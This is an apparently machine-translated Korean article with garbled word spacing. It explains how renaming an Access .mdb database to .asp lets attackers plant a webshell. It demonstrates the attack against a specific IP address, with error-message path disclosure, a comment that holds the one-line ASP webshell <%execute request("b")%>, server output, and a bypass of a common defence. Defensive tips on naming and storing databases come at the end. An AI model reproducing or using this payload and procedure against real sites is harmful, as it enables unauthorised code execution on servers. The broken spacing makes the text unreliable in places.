access mdb 를 asp 로 바 꾸 는 재난 mdb 다운로드 방지 방법

접 두 사 를 직접 바 꾸 는 것 은 물론 이 고 인터넷 속도 등 도구 로 직접 다운로드 할 수 있 습 니 다.사실은 침입 자 를 위해 문 을 열 었 습 니 다.침입 자 는 asp/asa 를 접미사 로 하 는 데이터 베 이 스 를 이용 하여 웹 셸 을 직접 얻 을 수 있 습 니 다.1.사고방식 은 모두 가 알 고 있 습 니 다.<%>는 asp 파일 의 표지 문자 입 니 다.즉,하나의 asp 파일 은<%>사이 의 코드 만 실행 합 니 다.access+asp 의 웹 시스템 의 모든 데 이 터 는 데이터베이스 파일(mdb 파일)에 저 장 됩 니 다.관리자 가 mdb 파일 을 asp 문서 로 바 꾸 었 기 때문에 우리 가 제출 한 데이터 에<%>가 포함 되 어 있다 면,그러면 이 asp 데이터 베 이 스 를 방문 할 때<%>사이 의 코드 를 실행 합 니 다.이렇게 해서 우 리 는 악성 코드 만 데이터베이스 에 제출 하 게 되 었 다.그러면 asp 접미사 의 데이터 베 이 스 는 바로 우리 의 웹 셸 이다.2.예 를 들 어 목 표를 마음대로 찾 습 니 다.우선 asp 접미사 의 데이터 베 이 스 를 보 겠 습 니 다.http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210 반환:
 
Microsoft VBScript '800a03f6'
'End'

/iisHelp/common/500-100.asp, 242

Microsoft JET Database Engine '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp' 。 , 。

/test/conn.asp, 18
제출:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp 는 인터넷 급행열차 등 도구 로 데이터 베 이 스 를 직접 다운로드 할 수 있 습 니 다.우 리 는 홈 페이지 로 돌아 가'네티즌 평론'기능 을 제공 하 는 것 을 보 았 다.사용 자 를 등록 하고 댓 글 을 보 냅 니 다.<%execute request("b")%>이렇게 하면 asp 코드:<%execute request("b")%>를 데이터베이스 에 기록 합 니 다.그러면 데이터 베 이 스 는 바로 우리 의 웹 셸 입 니 다.제출:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp 는 어 지 러 운 코드 의 마지막 에 보 았 습 니 다
 
/iisHelp/common/500-100.asp, 242
Microsoft VBScript '800a000d'

: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp, 1266
주의:우리 가 데이터베이스 에 코드 를 제출 할 때 코드 내용 이 너무 크 면 안 됩 니 다.그래서 우 리 는<%execute request("b")%>를 사용 합 니 다.3.다른 문제 와 사고 1.접 두 사 를 asp 로 바 꾸 었 고 데이터베이스 에<%='a'-1%>등 불법 asp 코드 를 추가 하여 다운로드 하 는 데이터 베 이 스 를 철저히 방지 합 니 다.불법 asp 코드 가 존재 하기 때문에 우리 의 webshell 코드 를 삽입 한 후에 실행 하면 앞의 불법 코드 의 오류 만 표시 하고 우리 셸 의 코드 를 실행 하지 않 습 니 다.비록 이렇게 하면 일정한 공격 을 방지 할 수 있 지만 일정한 위험 이 존재 합 니 다.우 리 는 잘못된 코드 전에 호 환 오류 코드 를 추가 하면 우리 가 삽입 한 웹 셸 코드 를 정확하게 표시 할 수 있 습 니 다.2.접 두 사 를 고치 지 않 은 mdb 파일 에 대해 서 는 배경 비밀 번 호 를 직접 다운로드 하여 배경 에 들 어 갈 수 있 습 니 다.데이터 베 이 스 를 이용 하여 예비 접 두 사 를 asp 로 바 꿀 수 있 습 니 다.mdb 다운로드 방지 방법 소결 1:iis 6 아래 확장자 가 정의 되 지 않 으 면 접근 할 때 파일 이 찾 지 못 한 404 오류 가 발생 합 니 다.따라서 데이터 베 이 스 를 절대 나타 나 지 않 는 파일 이름 으로 임의로 명명 하면 안전 한 효 과 를 얻 을 수 있다.예 를 들 어 xxxxx.xxxxxxxxxxxxxxxxxxxx 2 는 데이터 베 이 스 를 사이트 외부 에 두 면 절대 접근 할 수 없다.예 를 들 어 e:/web/는 웹 사이트 에서 데이터 베 이 스 를 e:/3 에 놓 습 니 다.4.mdb 를.asp 로 바 꾸 거나 winhex 로 열 면 176 이후 아주 긴 00 문자열 이 있 음 을 발견 할 수 있 습 니 다.예 를 들 어<%response.write('불법 접근')response.end()%>는 현재 데이터베이스 이름 에'\#'과 빈 칸 을 모두 풀 었 습 니 다.자신의 서버 라면 IIS 에 설정 합 니 다.빈 DLL 파일 을 새로 만 든 다음 IIS 에 맵 을 추가 합 니 다.방금 만 든 이 DLL 을 실행 할 수 있 습 니 다.확장 자 는 mdb 를 쓰 고 저장 한 후에 IIS 서 비 스 를 다시 시작 하면 됩 니 다.

좋은 웹페이지 즐겨찾기